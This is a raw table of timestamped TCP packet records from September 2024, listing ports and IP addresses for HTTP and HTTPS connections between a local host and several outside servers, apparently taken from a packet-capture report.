Sep 27, 2024 01:38:15.143032074 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.143058062 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.143058062 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.143137932 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225229979 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225271940 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225325108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225358963 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225361109 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225394964 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225395918 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225430965 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225436926 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225482941 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225531101 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225533962 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225567102 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225579977 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225579977 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225600958 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225634098 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225667953 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225667953 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225698948 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225711107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225737095 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225763083 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225785971 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225800991 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225820065 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225869894 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225903034 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225914955 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225914955 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225914955 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225936890 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.225949049 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.225969076 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226005077 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226017952 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226018906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226068974 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226073027 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226118088 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226177931 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226188898 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226188898 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226212978 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226259947 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226259947 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226264954 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226299047 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226331949 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226346016 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226372004 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226382971 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226385117 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226418018 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226435900 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226449966 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226476908 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226496935 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226496935 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226510048 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226524115 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226573944 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226591110 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226605892 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226638079 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226669073 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226670027 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226670027 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226685047 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226703882 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226716042 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226736069 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226744890 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226768970 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226789951 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226798058 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226830959 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226854086 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226854086 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226862907 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226893902 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226897955 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226919889 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226943016 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.226952076 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.226975918 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227000952 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227010012 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227032900 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227041006 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227075100 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227101088 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227101088 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227106094 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227121115 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227138996 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227157116 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227171898 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227190971 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227224112 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227238894 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227260113 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227268934 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227313995 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227335930 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227344036 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227366924 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227380037 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227406979 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227432013 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227447033 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227478981 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227510929 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227514982 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227526903 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227557898 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227581978 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227591038 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227608919 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227622986 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227658033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227662086 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227675915 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227710009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227721930 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227744102 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227771997 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227776051 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227798939 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227808952 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227859020 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227870941 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227870941 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227907896 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227937937 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227940083 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227972984 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.227977037 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.227977037 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228005886 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228039026 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228045940 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228045940 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228070974 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228104115 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228116035 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228116035 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228138924 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228156090 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228169918 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228190899 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228202105 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228225946 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228234053 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228269100 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228276014 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228276014 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228300095 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228326082 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228333950 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228367090 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228367090 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228391886 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228400946 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228413105 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228429079 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228451967 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228461027 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228487015 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228502989 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228509903 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228548050 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228575945 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228596926 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228611946 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228630066 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228643894 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228662968 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228672981 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228696108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228728056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228734970 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228734970 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228759050 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228765011 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228791952 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228811026 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228825092 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228857994 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228877068 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228877068 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228888988 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228921890 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228952885 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.228969097 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228969097 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228969097 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.228986979 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229018927 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229022026 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229053020 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229054928 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229073048 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229090929 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229096889 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229126930 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229157925 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229162931 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229191065 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229193926 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229212046 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229224920 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229259014 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229286909 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229286909 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229290962 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229306936 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229322910 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229348898 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229356050 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229367018 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229389906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229420900 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229449034 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229449034 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229454041 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229485989 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229515076 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229515076 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229516983 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229533911 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229548931 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229582071 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229598999 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229598999 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229609966 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229628086 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229643106 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229665995 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229690075 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229718924 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229737997 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229737997 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229753017 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229784966 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229815960 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229831934 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229831934 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229831934 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229849100 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229882002 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.229912996 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229912996 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.229932070 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.312150002 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312167883 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312186956 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312200069 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312211037 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312213898 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.312223911 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.312294006 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.312294960 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.403603077 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:15.403654099 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:15.403748035 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:15.404263973 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:15.404278994 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:15.531852007 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.532078981 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.532136917 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.542870045 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.542905092 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.542923927 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.542932034 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.561728001 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:15.561758995 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:15.561820984 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:15.562096119 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:15.562110901 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.057926893 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.057991028 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.060472965 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.060487032 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.060797930 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.062491894 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.062491894 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.062556028 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.113770962 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:16.113823891 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:16.114234924 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:16.114242077 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:16.116306067 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:16.116312981 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:16.519232988 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.519529104 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.519665956 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.520458937 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.520484924 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.520499945 CEST	49739	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.520505905 CEST	443	49739	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.536897898 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.536936045 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:16.537012100 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.537357092 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:16.537380934 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.012304068 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.012428045 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.037952900 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.038017035 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.038026094 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.038065910 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.038084984 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.038136959 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.043629885 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.043644905 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.044465065 CEST	49738	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.044492006 CEST	443	49738	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.044576883 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.048708916 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.048728943 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.048861980 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.053884029 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.060144901 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237827063 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237864017 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237875938 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237891912 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.237916946 CEST	49734	80	192.168.2.7	147.45.44.104
